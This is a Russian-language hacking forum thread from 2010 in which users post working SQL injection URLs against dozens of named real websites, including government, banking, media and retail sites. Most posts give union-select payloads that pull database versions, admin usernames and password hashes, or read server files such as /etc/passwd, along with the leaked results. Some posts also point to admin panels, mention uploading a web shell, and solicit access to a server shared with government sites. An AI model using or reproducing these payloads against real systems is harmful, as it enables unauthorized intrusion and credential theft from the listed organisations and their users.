Просмотр полной версии : SQL Инъекции
.:[melkiy]:.
29.05.2010, 17:04
провайдер какой-то
http://ivseti.ru/news_view.php?id=408'+and+1=0+union+select+version (),2+--+
-----
http://urokiverstki.ru/news_view.php?id=-15'+union+select+1,2,version(),4,5,6+--+
Транс-Альянс
http://trals.ru/1.php?id=27+UNION+SELECT+1,concat_ws(0x3a,version( ),user(),database()),3,4,5,6,7+--+
VIP отели какие то)
http://www.vipexch.com/front/en/Leisure-1.php?id=34+AND+1=0+UNION+SELECT+1,concat_ws(0x3a, version(),user(),database()),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23+--+
http://www.rob-ban.com/guestbook/admin.php?id=1+'+UNION+SELECT+version(),2,3,4,5,6, 7,8,9+--+
инъекция с читалкой/писалкой файлов.
user = root@localhost
http://macrobiotics.ca/products.php?id=-25+UNION+SELECT+1,load_file('/etc/httpd/conf/httpd.conf')--
CyberHunter
29.05.2010, 21:57
http://www.klad.com.ua/products.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
version: 5.1.33-log
user: klad@localhost
database: klad
тИЦ: 10
PR: 2
http://germanfirms.ru/products.php?id=63+union+select+1+--+
version: 4.1.22-standard-log
user: db156426_4@local2
database: db156426_4
тИЦ: 30
PR: 4
http://www.phas.ru/products.php?id=-64+union+select+1,2,3,4,5+--+
version: 4.1.22-STANDARD-LOG
user: PHASRU_AYRAT@LOCALHOST
database: PHASRU_PRODUCT
тИЦ: 20
PR: 0
http://www.luxpolymer.ru/products.php?id=-22+union+select+1+--+
version: 4.0.25-standard
user: luxpoly_admin@web8.100mb.net
database: luxpoly_mer
тИЦ: 20
PR: 1
ACCESS
http://www.aztv.az/xbdx/x-1.asp?id=-9949+union+select+1,2,3,4,5,6,7,8,9+from+"table"&il=3000
PR-6
The Justice Law and Order Sector (JLOS)
Ministry of Justice and Constitutional affairs
Ministry of Internal affairs
The Judiciary
Uganda Prisons
Uganda Police Force
The Director of Public rosecutions
hттp://www.jlos.go.ug/page.php?pg=objectives+union+all+select+1,version( ),3,4,5,6,7,8,9,user(),11+limit+1,1--
4.0.27-standard
jlos_admin@localhost
Админка не найдена.
http://www.chairsandstools.com.au/products.php?id=-1+union+select+1,concat(cmslogin,0x3a,cmspwd),3,4+ FROM+tbl_cms--
Магазин. Админка на 加新零件类 (китайский, кажется)
http://www.racemotorparts.com/products.php?id=-722+union+select+1,2,3,concat_ws(0x3a,username,pas sword,LoginString),5,6,7,8,9,10,11,12,13,14,15,16, 17+FROM+admins--
Магазин.
http://www.liteaid.com/products.php?id=-249+union+select+1,2,concat_ws(0x3a,AdminName,Admi nEmail,AdminID,Username,Password),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19+FROM+mlm_administrator+L IMIT+0,1--
http://www.manipulas.ru/products/prodzoom.php?id=-4+and+1=2+union+select+1,2,concat_ws(version(),use r(),database(),@@version_compile_os),4,5,6,7,8,9,1 0+--
version : 5.0.67-Max
user : manipulas@localhost
database : manipulas_ru
os : suse-linux-gnu
http://www.manipulas.ru/products/prodzoom.php?id=-4+and+1=2+union+select+1,2,group_concat(iname,char (58),ilogin,char(58),ipassword+SEPARATOR+0x0b),4,5 ,6,7,8,9,10+from+users_items+--
а вот и админка
http://www.manipulas.ru/siteadmin/
Читалка
http://www.thelearningedge.com.au/products.php?id=-26+union+select+1,2,3,4,load_file('/etc/httpd/conf/httpd.conf')--
Пользователи (5d2e19393cc5ef67 = password)
http://www.thelearningedge.com.au/products.php?id=-26+union+select+1,2,3,4,concat_ws(0x3a,username,us erpassword)+FROM+ADMIN--
и
http://www.thelearningedge.com.au/products.php?id=-26+union+select+1,2,3,4,concat_ws(0x3a,Host,User,P assword)+FROM+mysql.user--
http://statletik.dk/profil.php?id=-109+or(1,1)=(select+count(0),concat((select+versio n()+from+information_schema.tables+limit+0,1),floo r(rand(0)*2))from(information_schema.tables)group+ by+2)--+&sex=k
pr5
http://www.morozilnik.ru/eng/addinfo/index.php?info=-39+and+1=2+union+select+1,concat_ws(@@version,user (),database(),@@version_compile_os),3+--
version : 5.0.32-Debian_7etch6-log
user : morozini@localhost
database : morozini
os : pc-linux-gnu
http://www.morozilnik.ru/eng/addinfo/index.php?info=-39+and+1=2+union+select+1,group_concat(uname,0x3a, upass+SEPARATOR+0x0b),3+from+users--
официальный сайт болельщиков СПАРТАКА http://spartak.msk.ru/
http://spartak.msk.ru/index.sema?a=articles&pid=-2+union+all+select+concat_ws(char(58),version(),us er(),database(),@@version_compile_os),2,3--
version : 5.0.84-log
user : w_spart@localhost
database : w_spart_sk
os : pc-linux-gnu
LanSilot
30.05.2010, 17:16
http://ecadigitallibrary.com/conference.php?cid=-5+union+all+select+1,2,concat_ws(user(),database() ,@@version_compile_os),4,5,6,7,8,9,10--
version : 5.0.77-log
user : hearst_ecahearst_eca@localhost
database : hearst_ecahearst_eca
os : redhat-linux-gnu
частное охранное предприятие ЭГИДА
http://www.egida-ohrana.ru/site/news.php?pid=3&nid=-190+union+select+1,concat_ws(0x0a,version(),user() ,database(),@@version_compile_os),3--
version : 5.0.32-Debian_7etch8-log
user : rib@localhost
database : rib_egida
os : pc-linux-gnu
http://www.cosmossolutions.net/p_inf.php?page=-1+union+select+concat_ ws(0x3a,version(),database(),user())--
Database Version : 4.1.22-log
Database name : eds2
User : eds2@205.178.145.65
http://www.anglofrenchbedandbreakfast.com/select.php?id=-253/**/UNION/**/SELECT/**/AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626 567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F ,User(),0x7873716C696E6A656E64),0x71),0x71),2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58/*
Database Version: 4.1.20-log
Database name: dbAFBB
User name: uAFBB@localhost
58 поолей!!!!
http://www.communityinclusion.org/doc.php?type=project&id=35&doc_id=-1+union+select+1,2,group_concat(TABLE_NAME)+FROM+I NFORMATION_SCHEMA.TABLES--
http://www.companycoltd.com/company_coltd.php?company_id=a43947323+union+selec t+1,2,version(),4,5,6,7,8,9,10,11,12,13+--+
Четвертая ветка.
http://www.tortissimo.de/index.asp?id=14+or+1=@@version
---------------------
Access
http://www.daewoo-electronics.de/eu/products/av_hc_system_prod.asp?idprod=-458+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 +from+"table"
PR-4
http://www.risa.co.uk/sla/song.php?songid=20094+union+select+1,version(),3,4 ,5,6+--+
Пятая ветка. Мне лень оформлять
http://www.pearcecollections.us/fa_ind.php?fid=-51'+union+select+1,2,3,4,5,version(),7,8,9,10,11,1 2,13,14,15,16,17+--+
version 5
РАЗВЛЕКАТЕЛЬНЫЙ ЦЕНТР POZITIV PARK!
http://www.pozitiv-park.com/index.php?pid=-1+union+select+1,2,3,4,5,concat_ws(0x2a,login,pass word),7+FROM+auth+limit+0,1--
200 http://www.pozitiv-park.com/admin/
ms_access
http://www.simonscomputers.co.uk/support/faq_mail.asp?category=edu&ID=-1436+union+select+1,2+from+"table"
http://wap2emo.ru/mail.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,column_name ,13+from+information_schema.columns+where+table_na me=0x7573657273+--
mySQL 5.0.92
http://wap2emo.ru/mail.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a,uid,login,pass),13+from+users+--
http://www.hockeydb.com/ihdb/stats/pdisplay.php?pid=-1+union+select+concat_ws(0x2a,user(),version(),dat abase()),2,3,4,5,6,7--
DezMond™
02.06.2010, 13:51
rap-al.org pr5
http://www.rap-al.org/index.php?seccion=5&f=edicion.php&id_publicacion=1&id_edicion=-59+union+select+1,2,3,concat_ws(0x3a3a,id_contact, user,password,id_group),5+from+adm_usuarios+limit+ 1,1+--+
fundacionconama.org
http://www.fundacionconama.org/view/index.php?idnavegacion=105&npag=6&idnoticia=-759+unIOn+sELEct+1,2,3,4,5,6,7,8,concat_ws(0x3a3a, login,password),10,11,12,13,14,15,16,17,18,19,20,2 1,22+from+usuarios+limit+4,1+--+&idpagina=8'
laelallibreria.com pr4
http://www.laelallibreria.com/php/buscar22.php?name=Geografia&&name2=-11'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+inf ormation_schema.tables+--+&&idioma=1
sodepaz.org pr6
http://www.sodepaz.org/palestina/index.php?mod=noticias&idNoticia=-8+union+select+1,2,3,4,5,6,group_concat(column_nam e),8,9,10+from+information_schema.columns+where+ta ble_name=0x7068706C6973745F61646D696E+--+&tipo=completa
fundacionvicenteferrer.org pr6
http://www.fundacionvicenteferrer.org/esp/index.php/utils/adjuntos/home.php?s=-46+union+select+1,2,3,4,5,concat_ws(0x3a3a,login,p assword),7,8,9+from+admin+--+&tipo=hemeroteca&idNoticia=8
costuraperfeita.com.br pr4
http://www.costuraperfeita.com.br/ultimas/mostrar_noticia.php?id=-3372'+union+select+1,2,3,4,5,6+--+
delphi7.info pr2
http://delphi7.info/?module=articles&id=-5'+union+select+1,2,3,concat_ws(0x3a3a,ID_MEMBER,m emberName,lastLogin,realName,passwd,emailAddress,w ebsiteUrl,ICQ),5+from+smf_members+limit+1,1+--+
java.gmobile.ru pr1
http://java.gmobile.ru/?content=browse&id=4+union+select+1,2,3,4,concat_ws(0x3a3a,id_acco unt,name,pass)+from+system_accounts+--+
radioscanner.ru pr4 tic550
http://www.radioscanner.ru/rating/item/-537'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26+from+airbase_ accepts+--+/
fagga.com.br pr5
http://www.fagga.com.br/ingles/noticias/index.php?id_noticia=-53'+union+select+1,2,3,4,5,6+--+
saberviver.org.br pr4
http://www.saberviver.org.br/index.php?g_edicao=-apoio_psicologico'+union+select+1,2,3,4,5,6,7,8,9+--+
virtualbooks.com.br pr6
http://www.virtualbooks.com.br/v2/melhores_autores/?cod=-00058'+union+select+1,2,3,4,concat_ws(0x3a3a,login ,senha),6+from+login+--+
horizontegeografico.com.br pr5
http://www.horizontegeografico.com.br/index.php?acao=exibirSecao&secao[id_secao]=-65+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,id_ usuario,nome,login,senha,email,admin,ativo),9,10,1 1,12,13,14,15,16,17,18,19,20,21+from+usuario+/*+
boalembranca.com.br pr5http://www.boalembranca.com.br/materias/ler.php?cod=-147'+union+select+1,2,3,4,5,6,7,8+--+
suprasoy.com.br pr3
http://www.suprasoy.com.br/index.php?secao=imprensa_interna&id_noticia=-57'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,nom e,email,login,senha,endereco,numero),7+from+downlo ad_center_login+limit+4,1+--+
ciclismosc.com.br pr4
http://www.ciclismosc.com.br/index.php?cod_local=12&id_noticia=-1779+union+select+1,2,3,4+--+
viqui.com.br pr3
http://www.viqui.com.br/index.php?cmd=link&linCodigo=-132+union+select+1,2,3,4,5+from+usuario+- -+
joinvilleinspecaoveicular.com.br pr2
http://www.joinvilleinspecaoveicular.com.br/index.php?cat=noticias&id_noticia=-7250+union+selec t+1,2,3,4,5,6,7,8+--+
clockshop.ru pr4 tic210
http://www.clockshop.ru/popupretail.php?retail=-2+union+select+1,2,3,4+from+settings+--+
cfeedayplanner.com pr5
http://www.cfeedayplanner.com/en/links.php?a=l&title=Education%20and20Training&id=-337'+union+select+1,2+--+
antitrick.com pr2
http://antitrick.com/rep.php?pid=-79+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,id_us uario,Apodo ,Correo_usuario,Pais,Acepta_contacto)+from+usuario +--+
marathonwatch.com pr4
http://www.marathonwatch.com/site/catalog.php?pid=-ww194007'+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14+--+
positive.rs pr5
http://www.positive.rs/racunari.php?&id_tip_komp=-163'+union+select+1,2,concat_ws(0x3a3a,id,use rname,password,options,active,date,name,grad),4,5, 6+from+bnl_users+--+&artikal=11115
hangmester.hu pr4
http://www.hangmester.hu/start.php?page=szeria&szeria=-165+union+select+1,2,3,concat_ws(0x3a3a, nev,jelszo),5,6,7,8,9,10,11,12,13,14,15,16+from+ad min+limit+0,1+--+
fucinadelcaos.com
http://www.fucinadelcaos.com/start.php?code_arti=-6+union+select+concat_ws(0x3a3a,id,username,p assword)+from+members+limit+1,1+--+&direzione=list_articoli.php
matplus.net pr3
http://www.matplus.net/pub/start.php?px=1201676259&app=forum&act=posts&fid=tt&tid=-290+union+se lect+1,2,3,4,5,6,concat_ws(0x3a3a,id,uid,datum,cou nt,user,stamp),8,9,10,11+from+a_logins+--+
flyvip.ru
http://flyvip.ru/index.php?option=gallery&Itemid=8&page=inline&id=23&catid=-1+union+select+1,2, 3,4,unhex(hex(uSEr())),6,7,8,9,10+--+&limitstart=2
info21.ru pr1
http://info21.ru/second.php?id=-53'+union+select+1,2,3,4+--+
lcc-moscow.ru pr4
http://www.lcc-moscow.ru/news.php?id=-1636+union+select+1,2,concat_ws(0x3a3a,id,login,pa ss,fio, agent),4,5,6,7+from+turizm_user+--+
student-avia.ru pr4
http://www.student-avia.ru/news.php?s=-3'+union+select+1,2,3,concat_ws(0x3a3a,login,pass) ,5+fro m+users+--+
oxothik.ru pr2 tic50
http://oxothik.ru/index.php?action=news&id=-81+union+select+1,2,3,4,5,6,7+--+
horrorworld.ru pr3 tic40
http://horrorworld.ru/read.php?id_author_text=-417+union+select+1,concat_ws(0x3a3a,login,pass), 3,4,5,6,7,8,9,10,11,12,13+from+users+--+&PHPSESSID=65c30a17ce14c4d9c199735c2794d829
7v1spb.ru pr3
http://www.7v1spb.ru/second.php?id=7&razdel=-1+union+select+1,table_name,3+from+information_sch ema.tables+--+
bohlweki.co.za pr4
http://www.bohlweki.co.za/librarybycat.php?cat_UID=-1+union+select+1,concat_ws(0x3a3a,u_name,p_ word,U_ID),3,4,5,6,7,8,9+from+users+--+
topbelladonna.com pr2
http://www.topbelladonna.com/personal.php?id=-3539+union+select+concat_ws(0x3a3a,id,login,passw ord)+from+roots+--+&lang=en
mapb.ru pr3 tic90
http://www.mapb.ru/?prm=-14+union+select+user(),2,3+--+
cardworld.ru pr4 tic30
http://www.cardworld.ru/view.php?news=-346'+union+select+1,2,3,4,5,6,7+--+
banktech.ru pr5 tic90
http://banktech.ru/view.php?news=-383'+union+select+1,2,3,4,group_concat(table_name) ,6,7+from+i nformation_schema.tables+--+
leninetz-bt.ru pr3 tic40
http://www.leninetz-bt.ru/content.php?s=-17'+union+select+concat_ws(0x3a3a,login,password,n ame, rights)+from+leninets_users+--+
sibohrana.ru
http://sibohrana.ru/news.php?action=view&id=-11+union+select+1,2,3,concat_ws(0x3a3a,id,uname,pa ss,date),5+from+elekon_users_tbl+--+
ascod.ru pr3 tic90
http://www.ascod.ru/news/news.php?id=-56+union+select+1,2,3,4,5+--+
morekisok.ru pr3
http://www.morekisok.ru/mos/devochki/ankets/-63'+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,logi n,password),8,9+from+users+--+/
avtonom77.ru pr4 tic120
http://avtonom77.ru/product/-217+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38+--+
servistroi.ru
http://servistroi.ru/index.php?id_typ=-87+union+select+1,2,3,4,5,6,table_name,8,9,10,11,1 2,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+i nformation_schema.tables+--+
cifrovojlider.ru
http://cifrovojlider.ru/show_good.php?idtov=-1260'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18+--+
csadv.ru pr3 tic50
http://www.csadv.ru/?p_id=-34+union+select+concat_ws(0x3a3a,id,login,password ,name,sections,ite ms)+from+qtyrs_users+limit+1,1+--+
mashin.ru pr5 tic210
http://www.mashin.ru/jurnal/newsbody.php?idnews=-00076+union+select+1,2,3,concat_ws(0x3a3a,name ,password)+from+users+--+&news=newsast&id=2'
mfish.vzmorie.ru
http://mfish.vzmorie.ru/second.php?begin=-26+union+select+1,2,3,4,5,6,7+--+
lilywashere.ru pr3
http://www.lilywashere.ru/second.php?id_parent=-33+union+select+1,2,3,4,5,6+--+&id=3
lanacion.com.ve pr5
http://www.lanacion.com.ve/lis_n_sec.php?CId=-11+union+select+1,2,3,4,table_name,6,7,8,9,10+fro m+information_schema.tables+--+
poxudenie.info
http://www.poxudenie.info/site/cat.php?razdel=-7+union+select+1,database(),3+--+&p=2
logiseine.fr pr3
http://www.logiseine.fr/fr/html/fiche_logt_vente.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11 +--+
mira.co.il pr4
http://www.mira.co.il/AyalaBar.php?catid=-7+union+select+1,2,3,user(),5,6,7,8+--+
valorplast.com pr5
http://www.valorplast.com/Front/index.php?RID=197&AID=-44+union+select+1,2,3,4,5,6,7,8,9,10,11, 12,13,14+from+hosting+--+
ecodem3d.fr
http://www.ecodem3d.fr/actu/article.php?id_art=-2+union+select+1,2,3,4,5,6,7,8,9,10,11+from+inf ormation_schema.tables+--+
theatredenimes.com pr5
http://www.theatredenimes.com/pub_1.php?id=-54'+union+select+1,2,3,4,table_name,6,7,8+from+inf o rmation_schema.tables+--+
vernaison.fr pr2
http://www.vernaison.fr/fiche_entreprise.php?id=-108+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3 a,email,nom_site,url_site,login,pass,statut),9,10, 11+from+spip_auteurs+--+
cc-rhuys.lacommunautedecommunes.fr pr2
http://cc-rhuys.lacommunautedecommunes.fr/communaute/article_menu_explication.php?id_art=-22114 '+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,email ,nom,mdp,droit,nom_prenom,fonction,signature, signature_defaut,page_defaut),7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39+from+admin+/*+
clddm.com pr4
http://www.clddm.com/fiche_entreprise.php?e_id=-135'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,conc at_ws(0x3a3a,LeUser,pass,droits,idMediatheque,Nom, Prenom,Courriel),45,46,47,48,49,50,51,52,53,5 4+from+admin+--+
ftlb.be pr5
http://www.ftlb.be/en/attractions/musee/liste.php?tous=1&pay_id=-10+union+select+1,2,table_name ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55,56,57,58,59,60,61,62,63,64,65,66,67,68, 69,70+from+information_schema.tables+--+
documentation.ird.fr pr7
http://www.documentation.ird.fr/fdi/liste.php?annee=-2009+union+select+1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65+--+&dom=sva&typ=art
PS всё проверил на баяны!
http://www.piemontelifesciences.org/op.php?IDM=61&ID=-136+union+select+1,aes_decrypt(aes_encrypt(concat_ ws(0x3a,user(),version(),database(),@@version_comp ile_os),1),1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21
http://www.msk-tr.gazprom.ru/news/jubilee/item.php?jubileeID=-43+union+select+1,2,database(),4,user( ),6,7,8,9--
DB: mtg131_main
User: mtg131_main@v22.valuehost.ru
Version: 4.0.27-log
www.dragg.ru
http://www.dragg.ru/index.php?nomer=28+'+UNION+SELECT+1,2,3,4,5,6,conc at_ws(0x1a,version(),user(),database()),8,9,10,11, 12,13,14+--+
5 ветка.
http://www.dragg.ru/index.php?nomer=28+'+UNION+SELECT+1,2,3,4,5,6,TABL E_NAME,8,9,10,11,12,13,14+FROM+INFORMATION_SCHEMA. TABLES+--+
таблицы.
http://www.dragg.ru/index.php?nomer=28+'+UNION+SELECT+1,2,3,4,5,6,conc at_ws(0x1a,username,password),8,9,10,11,12,13,14+F ROM+jos_users+--+
юзеры.
www.vizavi-2000.ru
http://www.vizavi-2000.ru/index.php?nomer=-70+'+UNION+SELECT+concat_ws(0x1a,version(),user(), database()),2,3+--+
5 ветка.
http://www.vizavi-2000.ru/index.php?nomer=-70+'+UNION+SELECT+TABLE_NAME,2,3+FROM+INFORMATION_ SCHEMA.TABLES+--+
таблицы.
wildshaman
03.06.2010, 20:37
ТИЦ 240 PR 5
http://www.staroeradio.ru/sr-player.php?id=-13414+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4+from+mysql.user
ТИЦ 475 ПР 5
http://www.maksmedia.ru/price.htm?indx=42+union+select+1,222,333,concat_ws (0x3a,user(),version(),database())
masiaru@localhost:5.0.26-log:masiaru
ТИЦ 325 ПР 6
http://www.baltic-course.com/rus/baltija_sng/?doc=-27167+union+select+concat_ws(0x3a,user(),version() ,database()),2,3,4,5,6,7,8,9,10,11,12&ins_print
balticcourse@localhost:5.0.51a-24+lenny2:balticcourse
ТИЦ 80 ПР 4
http://www.musagetes.com/list.php?start=1&cid=-14+union+select+1,2,concat_ws(0x3a,user(),version( ),database())
sergey@localhost:5.0.51a-community-nt:konkurs
ТИЦ 275 ПР 4
http://www.tv-digest.ru/week.php?from=2010-2-15&to=-2010-2-21'+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a, user(),version(),database()))),6/*
w_tvdig@195.42.160.22:5.0.18-1.gms:w_tvdig
jecka3000
03.06.2010, 22:58
http://www.dahab-club.ru/index.php?id=-123+union+select+concat(version(),0x20,database(), 0x20,user())--
docs5.1.36-log
dahab_club_sait
dahab-club_vanek@212.193.230.89
wildshaman
03.06.2010, 23:19
ТИЦ 250 ПР 5
http://www.show-master.ru/studio/details.php?id_studio=70++union+select+1,2,concat_ ws(0x3a,user(),version(),database()),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22+--
show-master_ru@zvm19.host.ru:4.0.27-log:show-master_ru
Вывод внизу
ТИЦ 180 ПР5
http://zateevo.ru/?section=zatanswer&qid=-74+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7+--
zateevow@web-zateevo.pollux:5.0.84:zateevo
ТИЦ 150 ПР 5
http://www.egmont.ru/books/series/articles.php?id=168+union+select+1,2,3,4,concat_ws (0x3a,user(),version()),6,7,8,9,10,11,12,13,14+--
u44362@10.10.223.205:5.0.67-log
ТИЦ 750 ПР 6
http://www.interfax.kz/?lang=rus&int_id=10&news_id=-3521+union+select+1,2,3,4,5,concat_ws(0x3a,user(), version(),database()),7,8,9,10,11+--
dbinter1@w5.isd.kz:5.0.67:dbinter1
wildshaman
04.06.2010, 11:28
Тиц 2200 ПР 6!!
http://www.avtoradio.ru/?an=foto_frame&fotoid=-9842'+union+select+concat_ws(':',user(),version(), database()),2,3,4,5,6,7,8,9,10,11,12,13,14,'2
AR08user@www1:5.1.29-rc-log:aradio
Раскруучивать так:
http://www.avtoradio.ru/?an=foto_frame&fotoid=-9842'+union+select+table_name,2,3,4,5,6,7,8,9,10,1 1,12,13,14,2+from+information_schema.tables+limit+ 0,1+union+select+table_name,2,3,4,5,6,7,8,9,10,11, 12,13,14,2+from+information_schema.tables+where+'1 '='1
http://www.leisureafrique.net/page.php?id=-3+union+select+1,group_concat(0x0b,TABLE_NAME),3+f rom+information_schema.tables--
http://www.fetemusiqueillkirch.com/scene.php?id=-3+union+select+1,group_concat(0x0b,TABLE_NAME),3,4 ,5,6,7+from+information_schema.tables--
http://www.dannunziocorp.com/cap.php?id=-3+union+select+1,2,group_concat(0x0b,TABLE_NAME)+f rom+information_schema.tables--
http://www.pole1.ru/tovar.php?id=-3+union+select+1,2,concat_ws(0x3a3a,nik,passw),4,5 ,6,7+from+personaly--
http://www.eipcscreensavers.com/product.php?id=-6+union+select+1,group_concat(0x0b,TABLE_NAME),3,4 ,5,6,7,8,9,10,11,12,13,14,15+from+information_sche ma.tables--
wildshaman
04.06.2010, 21:23
ТИЦ 600 Пр 3
http://www.oldnewrock.ru/index.php?cont=shark&id=-381+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database()),6
sapeum_oldnewr01@localhost:5.1.39-log:wwwsapeumru_oldnewrock
PostgreSQL
http://www.thegadgetshop.co.za/products_list.php?main_cat_id=-15+union+select+null,null,null,null,column_name,nu ll,null,null,null,null,null,null,null+from+informa tion_schema.columns+where+table_name=chr(97)||chr( 100)||chr(109)||chr(105)||chr(110)||chr(105)||chr( 115)||chr(116)||chr(114)||chr(97)||chr(98)||chr(10 8)||chr(101)||chr(95)||chr(114)||chr(111)||chr(108 )||chr(101)||chr(95)||chr(97)||chr(117)||chr(116)| |chr(104)||chr(111)||chr(114)||chr(105)||chr(122)| |chr(97)||chr(116)||chr(105)||chr(111)||chr(110)|| chr(115)--
wildshaman
04.06.2010, 22:23
ТИЦ 500 PR 5
http://www.radioalla.ru/?an=foto_frame&fotoid=-999'+union+select+concat_ws(':',user(),version(),d atabase()),2,3,4,5,6,7,8,9,10,11,12,13,14,'2
alla@www1:5.1.29-rc-log:alla
ТИЦ80 Пр 4
http://www.murzilki.ru/?an=foto_frame&fotoid=-999'+union+select+concat_ws(':',user(),version(),d atabase()),2,3,4,5,6,7,8,9,10,11,12,13,14,'2
AR08user@www1:5.1.29-rc-log:aradio
http://www.mir44.ru/index.php?id_categ=-26+union+select+1,2,3,4,5,6,7,concat_ws(char(58),@ @version,user(),database(),@@version_compile_os),9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28+--
version : 5.0.90
user : citydesign@localhost
database : mir44
os : redhat-linux-gnu
http://signdiscounters.com/price.php?id=-2+union+select+1,2,group_concat(0x0b,username,0x3a 3a,password)+from+sign_user--
BlackFan
05.06.2010, 13:56
ТИЦ 600 ПР 5
http://www.spartak-nalchik.ru/results?view=match&id=6+union+select+1,2,3,4,5,6,concat_ws(0x3a,user( ),version(),database()),8
nalchik@localhost:5.0.51a-24+lenny2:nalchik
ТИЦ 350 ПР 5
http://www.unitex.ru/pr/pr.phtml?id=99+union+select+1,concat_ws(0x3a,user( ),version(),database()),3,4,5,6,7,8+limit+1,1
unitex@unitex.aha.ru:5.0.67-log:unitex
CyberHunter
05.06.2010, 14:23
http://www.langoldccc.org.uk/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x 3a,password%29,2,3,4+from+jos_users--
PR: 2
CY: 0
http://www.ambicom.com/prod_detail.php?pid=-1+union+select+1,2,3,4,5,load_file(0x2f6574632f706 173737764),7,8,9,10,11,12,13,14,15--
http://www.scmmicro.com/security/view_product_en.php?PID=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,load_fil e(0x2f6574632f706173737764),14,15,16,17,18,19,20,2 1,22--
http://www.decoprint.fr/products.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,load_file(0 x2f6574632f617061636865322f73697465732d656e61626c6 5642f3030302d64656661756c74)--
BlackFan
05.06.2010, 15:56
http://www.zenit-trade.ru/news/id219+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4,5,6,7,8,9,10+limit+1,1/
zenitt@localhost:5.0.45:zenitt
http://pic.fc-zenit.ru/info/viewPhoto.phtml?gallery=461+and+substring(version( ),1,1)=5
http://www.neocutis.com/article.php?sid=-15+union+select+1,2,3,concat_ws(0x2a,user(),versio n(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19--
neocutis@localhost*5.0.84-log*neocutis, читает файлы, шелл льётся на "ура", но safe_mode: ON; Disable functions : set_time_limit,passthru,exec,system,popen,shell_ex ec,proc_open; Linux imu200 2.6.27.34-imu-x86 #1 SMP Wed Sep 16 10:41:11 CEST 2009 i686
CyberHunter
05.06.2010, 20:25
http://www.fittleworth.net/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28database%28 %29,user%28%29,version%28%29%29,2,3,4+from+jos_use rs--
Version: 4.1.22-standard
Database: jmedfit_jcmsfittle
User: jmedfit_jcmsfit@localhost
Ameria Bank
http://www.ameria.am/index.php?page=8+and+1=0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19--
user () : ameria_dbuser@localhost
version () : 5.0.90-community-log
database () : ameria_site
OS : pc-linux-gnu
PR-5
wildshaman
06.06.2010, 02:06
Сайт на серваке с правительственным ege.edu.ru и mob.gov.ru
Кто доберется до него - прошу в ПМ
http://contest.informika.ru/lot_list.php?st2=1&dir&action=&cont=&lot=&y_beg=2005&y_fin=-2006+union+select+1,unhex(hex(concat_ws(0x3a,user( ),version(),database()))),3,4,5/*
www@localhost:4.1.13:contest
aka_zver
06.06.2010, 13:50
http://newen.pdpegypt.org
ТИЦ: 0
PR: 4
http://newen.pdpegypt.org/cms.php?id=event_details&event_id=-14+union+select+1,2,concat_ws(0x0b,version(),user( ),database(),@@version_compile_os),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18--+
http://newen.pdpegypt.org/cms.php?id=event_details&event_id=-14+union+select+1,2,group_concat(0x0b,username,0x3 a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+fro m+admin--+
